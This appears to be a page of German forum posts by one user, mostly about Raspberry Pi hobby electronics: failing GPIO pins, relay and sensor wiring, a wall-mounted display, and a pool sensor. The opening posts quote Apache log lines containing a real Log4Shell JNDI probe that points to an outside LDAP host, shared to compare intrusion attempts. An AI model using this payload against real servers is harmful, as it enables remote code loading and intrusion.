Posts by jjk

    Code
    cat /var/log/apache2/access.log | grep jndi
    107.189.29.181 - - [19/Dec/2021:13:25:47 +0100] "GET / HTTP/1.1" 200 1014 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}"

    Wir haben etwas gemeinsam


    MfG


    Jürgen

    Eine Minute vorher dieselbe IP bei mir...

    Code
    cat /var/log/apache2/access.log | grep jndi
    107.189.29.181 - - [19/Dec/2021:13:24:37 +0100] "GET / HTTP/1.1" 200 536 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}"

    Hallo Kuczerek,


    Mit welchem Kleber hast Du denn denn die Gegenstücke der Magneten hinten am Display angeklebt?

    Geklebt ist nur das Gehäuse selbst in die Wand mit PU Schaum. Eine Mutter ist im Gehäuse eingeschmolzen. Da eine Schraube rein und ein Magnet drauf, wie man im ersten Bild in Beitrag #22 sieht. So lässt sich der Abstand einstellen. Der Magnet hält das Display dann an der Rückseite aus Metall fest.

    (Die Rückseite sieht so aus: https://www.berrybase.de/media…5/c3/3e/ID_98236_orig.jpg )

    Bei Dir ist es so gelöst, dass der Glasrahmen das gedruckte Gehäuse überdeckt, oder? In anderen Worten: Die 3M Klebestreifen auf der Rückseite des Display liegen an der Wand an (vermutlich ohne das sie daran kleben), und überdecken das Loch in der Wand. Die Magnete aus Deinem Gehäuse haften nicht auf der Breite der 3M Klebestreifen auf der Rückseite des Displays an, sondern weiter innen, richtig?

    Alles richtig.

    Ich glaube, hier ist man sich nicht so wirklich einig. Vielleicht wäre die einfachste Möglichkeit, einen Arduino per USB mit dem Raspberry zu verbinden und dann die Pins vom Arduino zu schalten. Dann hätte ich die ganze Hardware nicht am 80€ Raspberry, sondern am 5€ Arduino. Wenn der mal kaputt geht, was er nicht tun sollte, da er deutlich stabiler läuft, dann ist es billiger ;). Das Relais ist auch eigentlich eher für den Arduino gemacht - würde also passen.

    Wozu eigentlich? Warum nutzt du nicht die internen des Pis?

    In der Regel ist es sinnvoll, echte Widerstände in der Schaltung zu verbauen. Weil man die nicht vergisst softwareseitig zuzuschalten. Das Problem dabei ist, dass man nicht sicher sein kann, dass das immer und in jedem Fall funktioniert. Wenn eine Eingangsschaltung darauf angewiesen ist, dann kann es zu einer Fehlfunktion führen, wenn der Widerstand fehlt. Insofern ist es besser, externe Widerstände zu verwenden. Da sieht man auch das sie vorhanden sind.

    Deine Frage offenbart, dass du noch reichlich wenig Erfahrung hast. Du solltest dir echt noch mal ein paar Grundlagen aneignen.

    Ich möchte eben auf Nummer sicher gehen und nicht nochmal einen Pi zerschießen

    Ein bisschen Bedenken hätte ich mit 5,2 Volt am 5-V-Pin. Der Pi braucht die 5,1 eigentlich nur, weil der eine oder andere Verlust auf dem Weg bis zur Platine auftritt (Kabelwiderstand, Polyfuse, Verpolungsschutz oder sowas, vermute ich). An den 5-V-Pin würd ich auch nur 5 Volt anlegen - zumal das Mean Well Netzteil geregelt ist und mit 6,5 A die Spannung ganz sicher halten kann. Andererseits dürften 4% Überstpannung den Pi nicht gleich sterben lassen.

    Ich habe das damals so stark aufgedreht, da ich undervoltage hatte. Das lag dann aber, wie ich erst später erfahren habe, daran, dass die Versorgung über die GPIOs begrenzt ist. (1A pro Pin?). Da mir beim alten Pi der USB-C Stecker abgebrochen ist, hatte ich da keine andere Möglichkeit. Den neuen werde ich dann wieder über USB-C Versorgen.



    Was hast du an dem 3poligen Stecker an der Seite(GND/VCC/JD-VCC) angeschlossen bzw gebrückt?

    Der Jumper ist ebenfalls im Schaltbild im 1. Beitrag zu sehen.

    1. Version: Jumper zwischen VCC und JD-VCC

    2. Version: Kein Jumper, JD-VCC auf 5V

    Die 15-20mA würden sich dann aber auf das Relais beziehen? Also nicht auf den Optokoppler, der dann mit den GPIOs geschalten wird. Siehe Schaltplan: https://www.berrybase.de/media…s-RELM-82hFeRkCCbfqjN.pdf . Ich habe am selben GPIO und GND die 5V Versorgung vom Meanwell Netzteil (5,2V 6,5A). Die 5V würden also direkt vom Netzteil kommen und nicht durch den USB-C Stecker einmal durch den halben Pi und dann wieder am GPIO raus.

    (Wenn mans genau nimmt ist der andere 5V Pin und noch ein GND Pin auch mit dem Netzteil verbunden)

    Hallo zusammen,

    ich bräuchte mal wieder eure Hilfe. Mir ist gestern ein Pi abgeraucht und ich vermute, dass es an den GPIOs lag. Die Woche vorher gingen mir nämlich nach und nach die GPIOs kaputt. Ein neuer Pi ist schon bestellt, aber ich möchte nicht noch einmal den gleichen Fehler machen. Ich habe folgende Dinge angeschlossen:

    Relaismodul:

    https://www.berrybase.de/senso…n/5v-8-kanal-relais-modul


    Hier musste ich schon einen GPIO tauschen, da dieser bei ca. 2,1V "hängen geblieben" ist. Hier bin ich mir beim Anschließen nicht so ganz sicher. Ich hatte es lange Zeit so:


    Später dann so:


    Hat beides funktioniert, aber bei Variante 1 stören mich die 5V etwas. Welche Variante wäre die bessere?


    Dann habe ich noch zwei Stromzähler mit S0 Schnittstelle angeschlossen. Ich denke, dass hier ein Fehler sein könnte, da ich nur ca. jeden 5. Impuls mitbekommen habe. Hier musste ich ebenfalls ein Mal den GPIO wechseln. Dieser ist bei ca. 0,2V "festgehangen".

    Laut diesem Beitrag: RE: GPIO defekt? sollte ich auch lieber einen Pullup Widerstand verwenden und nach GND schalten, richtig?


    Bei meinen 5 wasserfesten Onewire Sensoren musste ich schon zweimal den GPIO wechseln. Zuerst hatte ich Pin 7, dieser funktionierte weiterhin wie ein GPIO, für onewire war er aber nicht mehr zu gebrauchen. Danach Pin 16, der ist dann wie die anderen komplett kaputt gegangen und zum Schluss noch Pin 18. Folgendermaßen sind sie angschlossen:

    Bei den Sensoren hatte ich noch ein Problem. Ich habe ein geschirmtes Kabel vom RPi zum Heizraum (ca. 4-5m). Am anderen Ende sind dann 3 Sensoren mit 1m Kabellänge und 2 Sensoren mit 5m Kabellänge. Sobald ich einen 6. Sensor mit 5m Kabellänge anschließe, sind alle Sensoren mit 5m Länge nicht mehr erreichbar. Ich denke, dass hier der Spannungsabfall zu hoch ist. Kann ich die Sensoren auch wie hier: http://bollwerk-essen.bplaced.net/?ds18x20 unter "Anschluss" die 2. Variante, anschließen? Ich habe auch hier DS18B20 Sensoren fallen aus, wenn mit Verlängerung angeschlossen gelesen, dass man dann auch kleinere oder sogar gar keine Widerstände verwenden kann.

    Hallo Holger und Josh,

    klar, die Software ist eine HTML/PHP Seite, die auf einem Apache Webserver auf dem Pi läuft. War mit dem alten Display auch schon so. Da das neue aber größer ist und somit mehr drauf passt, habe ich die Seiten etwas angepasst. Im Prinzip einfach nur ein paar Links an der Seite mit CSS gestyled und jeweils ein iframe links. Auf der "Home"- Seite läuft Grafana mit solaranzeige.

    Die Dateien findet ihr auf Github: https://github.com/jjk4/displayoberflaeche


    Hier noch ein paar Screenshots:


    Kühlkörper sind mitlerweile angekommen. Werde mal beobachten, wie sich die Temperatur entwickelt. Evtl. mus ich aktiv kühlen.

    Von der Hardware her ist jetzt (fast) alles fertig.

    Meine Standardansicht, die eigentlich so aussehen hätte sollen:

    ist wohl leider etwas zu viel geworden. Der RPi wird so heiß, dass er komplett abstürzt. Ich hab mir jetzt mal Kühlkörper bestellt und hoffe, dass es dann funktioniert.

    Ich hab mich jetzt wieder lange nicht mehr gemeldet. Gestern kam das Gehäuse in die Wand und heute werde ich die ganze Sache (zumindest hardwaretechnisch) noch fertigstellen. Hier mal ein paar Bilder:


    Vorher:


    Anzeichnen:


    Gehäuse mit Klemmen:


    Und mit RPi drin:

    Wäre HomeMatic eine Alternative? Die Batterie (z. B. 2x AA) würde sehr lange halten und es sind noch viel mehr Dinge damit möglich als nur die Temperatur des Pools zu erfassen. Die Sensoren/Aktoren kann man günstig selber bauen und flashen. Den Server macht ein RasPi3 (reicht völlig aus) mit RaspberryMatic. Ich weiss aus dem Forum, dass MQTT mit HomeMatic möglich ist, habe aber keine Ahnung, wie das geht.

    Gibt es das nur als Image? Dann bräuchte ich einen zusätzlichen Raspberry und noch ein Homematic Modul. Ich habe eigentlich außer dem Poolsensor nicht mehr vor. Das finde ich etwas übertrieben für meinen Anwendungsfall.

    Ich glaube nicht, dass ich das hier empfange.

    Aber ich möchte das auch nicht zu kompliziert machen. Es soll ja "nur" ein Poolsensor sein...

    Solarzelle könnte man machen. Ab welcher Größe würde das denn was bringen? Nachts könnte man ja vielleicht das Messintervall verlängern